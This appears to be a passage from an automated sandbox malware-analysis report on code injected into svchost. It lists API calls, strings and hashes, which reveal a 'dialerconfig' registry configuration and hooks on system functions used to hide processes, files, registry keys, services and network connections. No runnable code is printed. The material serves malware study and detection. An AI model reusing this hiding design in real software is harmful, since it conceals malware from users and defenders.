UnhandledExceptionFilter.KERNEL32 ref: 000002C9B0297F94

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: a8961a7ee651d4004dd02de9a6ecf2c2672b3a30a7564fe475d554afff6cfbc0
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: C73139B2204EC4A6FB60CF60F848BED6360F784748F44542ADA4D47A98EF38C98CC750

Function 000002C9AFBB7E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002C9AFBB7E8C
RtlCaptureContext.NTDLL ref: 000002C9AFBB7EB9
RtlLookupFunctionEntry.NTDLL ref: 000002C9AFBB7ED3
RtlVirtualUnwind.NTDLL ref: 000002C9AFBB7F14
IsDebuggerPresent.KERNEL32 ref: 000002C9AFBB7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000002C9AFBB7F89
UnhandledExceptionFilter.KERNEL32 ref: 000002C9AFBB7F94

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: b2887cc395a5faa7b00bf96b452436ab8b07bf9528739ccab47d8010a9f63bfb
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: EE314F73205B8096FB609F60E888BEE7374F788744F84442ADA4D47B99EF39C589C714

Function 000002C9AFBBB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002C9AFBBB585
RtlLookupFunctionEntry.NTDLL ref: 000002C9AFBBB59D
RtlVirtualUnwind.NTDLL ref: 000002C9AFBBB5D8
IsDebuggerPresent.KERNEL32 ref: 000002C9AFBBB611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002C9AFBBB61B
UnhandledExceptionFilter.KERNEL32 ref: 000002C9AFBBB626

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 8948c651d6124e182609c94cf1c10d7ef4f3a22f669835d067139a4db5baae0e
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 74314B37214B8086EB60CF25E84CB9E73B4F788794F544126EA9D47BA9DF39C596CB00

Function 000002C9AFBBFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002C9AFBBFF67
WriteFile.KERNEL32 ref: 000002C9AFBC021E
WriteFile.KERNEL32 ref: 000002C9AFBC0270
GetLastError.KERNEL32 ref: 000002C9AFBC0372
GetLastError.KERNEL32 ref: 000002C9AFBC03D2

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 1b87bc8c874e56d3d3c169fb44636a723f73c57bea5eb21ac934129e4f4b3f21
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 12E1CC23B14A809AF700CB64D48CBDE7BB1F3497C8F548116EE5E97B99DA39C596C700

Function 000002C9B029BC30 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002C9B029BC60

Strings

*?, xrefs: 000002C9B029BC87
ec, xrefs: 000002C9B029BFE3

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: *?$ec
API String ID: 3215553584-4092517795
Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
Instruction ID: 4f290b775e720b47b549e23564b5709454933e10cc69a551538e7e74c1750620
Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
Instruction Fuzzy Hash: 545107A6710FD4A5FF15CFA1A90CA9D27A5FB48BDCF445532DE0907B45DA38C885C350

Function 000002C9B0291650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002C9B029165B
HeapAlloc.KERNEL32 ref: 000002C9B029166A

Part of subcall function 000002C9B0291274: GetProcessHeap.KERNEL32 ref: 000002C9B029127A
Part of subcall function 000002C9B0291274: HeapAlloc.KERNEL32 ref: 000002C9B0291289
Part of subcall function 000002C9B0291274: GetProcessHeap.KERNEL32 ref: 000002C9B02912A3
Part of subcall function 000002C9B0291274: HeapAlloc.KERNEL32 ref: 000002C9B02912B4

RegOpenKeyExW.ADVAPI32 ref: 000002C9B02916DA
RegOpenKeyExW.ADVAPI32 ref: 000002C9B0291707
RegCloseKey.ADVAPI32 ref: 000002C9B0291721
RegOpenKeyExW.ADVAPI32 ref: 000002C9B0291741
RegCloseKey.ADVAPI32 ref: 000002C9B029175C
RegOpenKeyExW.ADVAPI32 ref: 000002C9B029177C
RegCloseKey.ADVAPI32 ref: 000002C9B0291797
RegOpenKeyExW.ADVAPI32 ref: 000002C9B02917B7
RegCloseKey.ADVAPI32 ref: 000002C9B02917D2
RegOpenKeyExW.ADVAPI32 ref: 000002C9B02917F2
RegCloseKey.ADVAPI32 ref: 000002C9B029180D
RegOpenKeyExW.ADVAPI32 ref: 000002C9B029182D
RegCloseKey.ADVAPI32 ref: 000002C9B0291848
RegOpenKeyExW.ADVAPI32 ref: 000002C9B0291868
RegCloseKey.ADVAPI32 ref: 000002C9B0291883
RegOpenKeyExW.ADVAPI32 ref: 000002C9B02918A3
RegCloseKey.ADVAPI32 ref: 000002C9B02918BE
RegCloseKey.ADVAPI32 ref: 000002C9B02918C8

Part of subcall function 000002C9B02912C8: RegQueryInfoKeyW.ADVAPI32 ref: 000002C9B0291326
Part of subcall function 000002C9B02912C8: GetProcessHeap.KERNEL32 ref: 000002C9B0291334
Part of subcall function 000002C9B02912C8: HeapAlloc.KERNEL32 ref: 000002C9B0291345
Part of subcall function 000002C9B02912C8: RegEnumValueW.ADVAPI32 ref: 000002C9B02913A1
Part of subcall function 000002C9B02912C8: GetProcessHeap.KERNEL32 ref: 000002C9B02913E9
Part of subcall function 000002C9B02912C8: HeapAlloc.KERNEL32 ref: 000002C9B02913F7
Part of subcall function 000002C9B02912C8: GetProcessHeap.KERNEL32 ref: 000002C9B029141B
Part of subcall function 000002C9B02912C8: HeapFree.KERNEL32 ref: 000002C9B0291429
Part of subcall function 000002C9B02912C8: lstrlenW.KERNEL32 ref: 000002C9B0291432
Part of subcall function 000002C9B02912C8: GetProcessHeap.KERNEL32 ref: 000002C9B0291440
Part of subcall function 000002C9B02912C8: HeapAlloc.KERNEL32 ref: 000002C9B029144E

Strings

tcp_remote, xrefs: 000002C9B0291861
process_names, xrefs: 000002C9B0291775
SOFTWARE\dialerconfig, xrefs: 000002C9B02916BA
pid, xrefs: 000002C9B029173A
udp, xrefs: 000002C9B029189C
service_names, xrefs: 000002C9B02917EB
tcp_local, xrefs: 000002C9B0291826
startup, xrefs: 000002C9B02916FD
paths, xrefs: 000002C9B02917B0

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: edf67af7bff66bc60ca8b53d111852400304fc793cd55a6ddbb0235c759f6c2a
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: B6710EA6710E95A5FB10DF66F85CA9D67A4FB45B8CF006121EE4D47B68DF38C888C780

Function 000002C9AFBB1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002C9AFBB165B
HeapAlloc.KERNEL32 ref: 000002C9AFBB166A

Part of subcall function 000002C9AFBB1274: GetProcessHeap.KERNEL32 ref: 000002C9AFBB127A
Part of subcall function 000002C9AFBB1274: HeapAlloc.KERNEL32 ref: 000002C9AFBB1289
Part of subcall function 000002C9AFBB1274: GetProcessHeap.KERNEL32 ref: 000002C9AFBB12A3
Part of subcall function 000002C9AFBB1274: HeapAlloc.KERNEL32 ref: 000002C9AFBB12B4

RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB16DA
RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB1707
RegCloseKey.ADVAPI32 ref: 000002C9AFBB1721
RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB1741
RegCloseKey.ADVAPI32 ref: 000002C9AFBB175C
RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB177C
RegCloseKey.ADVAPI32 ref: 000002C9AFBB1797
RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB17B7
RegCloseKey.ADVAPI32 ref: 000002C9AFBB17D2
RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB17F2
RegCloseKey.ADVAPI32 ref: 000002C9AFBB180D
RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB182D
RegCloseKey.ADVAPI32 ref: 000002C9AFBB1848
RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB1868
RegCloseKey.ADVAPI32 ref: 000002C9AFBB1883
RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB18A3
RegCloseKey.ADVAPI32 ref: 000002C9AFBB18BE
RegCloseKey.ADVAPI32 ref: 000002C9AFBB18C8

Part of subcall function 000002C9AFBB12C8: RegQueryInfoKeyW.ADVAPI32 ref: 000002C9AFBB1326
Part of subcall function 000002C9AFBB12C8: GetProcessHeap.KERNEL32 ref: 000002C9AFBB1334
Part of subcall function 000002C9AFBB12C8: HeapAlloc.KERNEL32 ref: 000002C9AFBB1345
Part of subcall function 000002C9AFBB12C8: RegEnumValueW.ADVAPI32 ref: 000002C9AFBB13A1
Part of subcall function 000002C9AFBB12C8: GetProcessHeap.KERNEL32 ref: 000002C9AFBB13E9
Part of subcall function 000002C9AFBB12C8: HeapAlloc.KERNEL32 ref: 000002C9AFBB13F7
Part of subcall function 000002C9AFBB12C8: GetProcessHeap.KERNEL32 ref: 000002C9AFBB141B
Part of subcall function 000002C9AFBB12C8: HeapFree.KERNEL32 ref: 000002C9AFBB1429
Part of subcall function 000002C9AFBB12C8: lstrlenW.KERNEL32 ref: 000002C9AFBB1432
Part of subcall function 000002C9AFBB12C8: GetProcessHeap.KERNEL32 ref: 000002C9AFBB1440
Part of subcall function 000002C9AFBB12C8: HeapAlloc.KERNEL32 ref: 000002C9AFBB144E

Strings

tcp_remote, xrefs: 000002C9AFBB1861
SOFTWARE\dialerconfig, xrefs: 000002C9AFBB16BA
paths, xrefs: 000002C9AFBB17B0
tcp_local, xrefs: 000002C9AFBB1826
startup, xrefs: 000002C9AFBB16FD
udp, xrefs: 000002C9AFBB189C
process_names, xrefs: 000002C9AFBB1775
pid, xrefs: 000002C9AFBB173A
service_names, xrefs: 000002C9AFBB17EB

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 75be89b8b9e40e83f0c6c096a9e2c60e59ff02eda41980db4d81739b12b8f543
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: C5711927310A5086FB10AF66E8ACB9E27B4FB88B88F451121DE4D57B69DF3AC485C700

Function 000002C9B02912C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002C9B0291326
GetProcessHeap.KERNEL32 ref: 000002C9B0291334
HeapAlloc.KERNEL32 ref: 000002C9B0291345
RegEnumValueW.ADVAPI32 ref: 000002C9B02913A1

Part of subcall function 000002C9B0291554: StrCmpIW.SHLWAPI ref: 000002C9B0291585

GetProcessHeap.KERNEL32 ref: 000002C9B02913E9
HeapAlloc.KERNEL32 ref: 000002C9B02913F7
GetProcessHeap.KERNEL32 ref: 000002C9B029141B
HeapFree.KERNEL32 ref: 000002C9B0291429
lstrlenW.KERNEL32 ref: 000002C9B0291432
GetProcessHeap.KERNEL32 ref: 000002C9B0291440
HeapAlloc.KERNEL32 ref: 000002C9B029144E
StrCpyW.SHLWAPI ref: 000002C9B0291470
GetProcessHeap.KERNEL32 ref: 000002C9B0291485
HeapFree.KERNEL32 ref: 000002C9B0291493

Strings

d, xrefs: 000002C9B0291365

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 020e772d576f00d99347add5f2292ba766c675e3c542068a2e6c9be56f318122
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 71513EB2614F84A6FB14CB62F54C75EB3A1F788B88F445124DA4947B24DF38C999C780

Function 000002C9AFBB12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002C9AFBB1326
GetProcessHeap.KERNEL32 ref: 000002C9AFBB1334
HeapAlloc.KERNEL32 ref: 000002C9AFBB1345
RegEnumValueW.ADVAPI32 ref: 000002C9AFBB13A1

Part of subcall function 000002C9AFBB1554: StrCmpIW.SHLWAPI ref: 000002C9AFBB1585

GetProcessHeap.KERNEL32 ref: 000002C9AFBB13E9
HeapAlloc.KERNEL32 ref: 000002C9AFBB13F7
GetProcessHeap.KERNEL32 ref: 000002C9AFBB141B
HeapFree.KERNEL32 ref: 000002C9AFBB1429
lstrlenW.KERNEL32 ref: 000002C9AFBB1432
GetProcessHeap.KERNEL32 ref: 000002C9AFBB1440
HeapAlloc.KERNEL32 ref: 000002C9AFBB144E
StrCpyW.SHLWAPI ref: 000002C9AFBB1470
GetProcessHeap.KERNEL32 ref: 000002C9AFBB1485
HeapFree.KERNEL32 ref: 000002C9AFBB1493

Strings

d, xrefs: 000002C9AFBB1365

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 6637026aa8957acafcd2e0a44d11b25380a02c6a99089ab3ce8c4a7b387b649c
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: F1512773214B449AFB14CB62E54CB9EB3B1F789B84F488124DA8D07B64DF39C596CB40

Function 000002C9B0291EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002C9B0291EBF

Part of subcall function 000002C9B0292174: GetModuleHandleA.KERNEL32 ref: 000002C9B029218C
Part of subcall function 000002C9B0292174: GetProcAddress.KERNEL32 ref: 000002C9B029219D

Part of subcall function 000002C9B0295C10: GetCurrentThreadId.KERNEL32 ref: 000002C9B0295C4B

Strings

NtResumeThread, xrefs: 000002C9B0291F02
NtQuerySystemInformation, xrefs: 000002C9B0291EE5
NtEnumerateKey, xrefs: 000002C9B0291F59
NtQueryDirectoryFileEx, xrefs: 000002C9B0291F3C
advapi32.dll, xrefs: 000002C9B0291F97, 000002C9B0291FB8
EnumServicesStatusExW, xrefs: 000002C9B0291FB1, 000002C9B0291FD2
NtDeviceIoControlFile, xrefs: 000002C9B0291FF6
NtQueryDirectoryFile, xrefs: 000002C9B0291F1F
EnumServiceGroupW, xrefs: 000002C9B0291F90
sechost.dll, xrefs: 000002C9B0291FD9
NtEnumerateValueKey, xrefs: 000002C9B0291F76
ntdll.dll, xrefs: 000002C9B0291ECD

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 7dff1f3bc662c7669749572a2cc9e8c08b78135b5d06f3b9d26c9fc167e4586a
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 0D314DE4211ECAB0FA44EB65F85DEDC3365BB4434CF807563951A121669E388EDEC3D0

Function 000002C9AFBB1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002C9AFBB1EBF

Part of subcall function 000002C9AFBB2174: GetModuleHandleA.KERNEL32 ref: 000002C9AFBB218C
Part of subcall function 000002C9AFBB2174: GetProcAddress.KERNEL32 ref: 000002C9AFBB219D

Part of subcall function 000002C9AFBB5C10: GetCurrentThreadId.KERNEL32 ref: 000002C9AFBB5C4B

Strings

NtResumeThread, xrefs: 000002C9AFBB1F02
NtQueryDirectoryFile, xrefs: 000002C9AFBB1F1F
NtEnumerateValueKey, xrefs: 000002C9AFBB1F76
sechost.dll, xrefs: 000002C9AFBB1FD9
ntdll.dll, xrefs: 000002C9AFBB1ECD
NtQuerySystemInformation, xrefs: 000002C9AFBB1EE5
NtEnumerateKey, xrefs: 000002C9AFBB1F59
advapi32.dll, xrefs: 000002C9AFBB1F97, 000002C9AFBB1FB8
NtDeviceIoControlFile, xrefs: 000002C9AFBB1FF6
EnumServicesStatusExW, xrefs: 000002C9AFBB1FB1, 000002C9AFBB1FD2
NtQueryDirectoryFileEx, xrefs: 000002C9AFBB1F3C
EnumServiceGroupW, xrefs: 000002C9AFBB1F90

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 20536cb3a11550025286f0da5bf58dd43d423097a010da5b39a9b468df922410
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 6631A3A760094AA0FB0AEF65E86EFDE2335B748344FC05523E61D535759E7A86CBC380

Function 000002C9B02923F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002C9B0292405
GetCurrentProcessId.KERNEL32 ref: 000002C9B029240F

Part of subcall function 000002C9B02919AC: OpenProcess.KERNEL32 ref: 000002C9B02919CA
Part of subcall function 000002C9B02919AC: IsWow64Process.KERNEL32 ref: 000002C9B02919E0
Part of subcall function 000002C9B02919AC: CloseHandle.KERNEL32 ref: 000002C9B02919FB

CreateFileW.KERNEL32 ref: 000002C9B0292468
WriteFile.KERNEL32 ref: 000002C9B0292490
ReadFile.KERNEL32 ref: 000002C9B02924AF
CloseHandle.KERNEL32 ref: 000002C9B02924B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 000002C9B029243F
\\.\pipe\dialerchildproc64, xrefs: 000002C9B0292438

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 3828eef182e77682c835e905423648d12de48cf2ebd051e7c49122040d7d8954
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 54213075614B84A2F710CB25F44C75E73A0F789BA8F505215EA5902BA8CF3CC98DCB40

Function 000002C9AFBB23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002C9AFBB2405
GetCurrentProcessId.KERNEL32 ref: 000002C9AFBB240F

Part of subcall function 000002C9AFBB19AC: OpenProcess.KERNEL32 ref: 000002C9AFBB19CA
Part of subcall function 000002C9AFBB19AC: IsWow64Process.KERNEL32 ref: 000002C9AFBB19E0
Part of subcall function 000002C9AFBB19AC: CloseHandle.KERNEL32 ref: 000002C9AFBB19FB

CreateFileW.KERNEL32 ref: 000002C9AFBB2468
WriteFile.KERNEL32 ref: 000002C9AFBB2490
ReadFile.KERNEL32 ref: 000002C9AFBB24AF
CloseHandle.KERNEL32 ref: 000002C9AFBB24B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 000002C9AFBB243F
\\.\pipe\dialerchildproc64, xrefs: 000002C9AFBB2438

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: fc180ee831c8506696d5602361e060754a6b7b84c742be8878aad9c971ab8d70
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 06210727614A4083FB108B25E55CB5F77B0F789BA4F944215EA9D02EA8DF3EC18ACB00

Function 000002C9B0295C10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002C9B0295C4B
GetThreadContext.KERNEL32 ref: 000002C9B0295DB5

Part of subcall function 000002C9B0295A40: GetCurrentThreadId.KERNEL32 ref: 000002C9B0295A44

Strings

ec, xrefs: 000002C9B0295C1C

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID: ec
API String ID: 1666949209-2323562846
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 0dace8d6bd9a90777621c15dd57f70dce61ecbc90fb16601d243c842cd82dca6
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: B2D1AB76208F9891EA60DB09F49C75E77A0F388B88F505126EECD47B65DF39C985CB40

Function 000002C9B029104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002C9B02910AB
RegEnumValueW.ADVAPI32 ref: 000002C9B029110E
GetProcessHeap.KERNEL32 ref: 000002C9B0291155
HeapAlloc.KERNEL32 ref: 000002C9B0291163
GetProcessHeap.KERNEL32 ref: 000002C9B0291187
HeapFree.KERNEL32 ref: 000002C9B0291195

Strings

d, xrefs: 000002C9B02910CE

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: a49da4dc936d3b5161c2ce1e4e3776f2a0795eb5f0739f6b27e4dba07b8df9f3
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 74414F73614BC4A7E764CF52E44C79EB7A1F389788F009125EB8907A58DF38D599CB40

Function 000002C9AFBB104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002C9AFBB10AB
RegEnumValueW.ADVAPI32 ref: 000002C9AFBB110E
GetProcessHeap.KERNEL32 ref: 000002C9AFBB1155
HeapAlloc.KERNEL32 ref: 000002C9AFBB1163
GetProcessHeap.KERNEL32 ref: 000002C9AFBB1187
HeapFree.KERNEL32 ref: 000002C9AFBB1195

Strings

d, xrefs: 000002C9AFBB10CE

Memory Dump Source

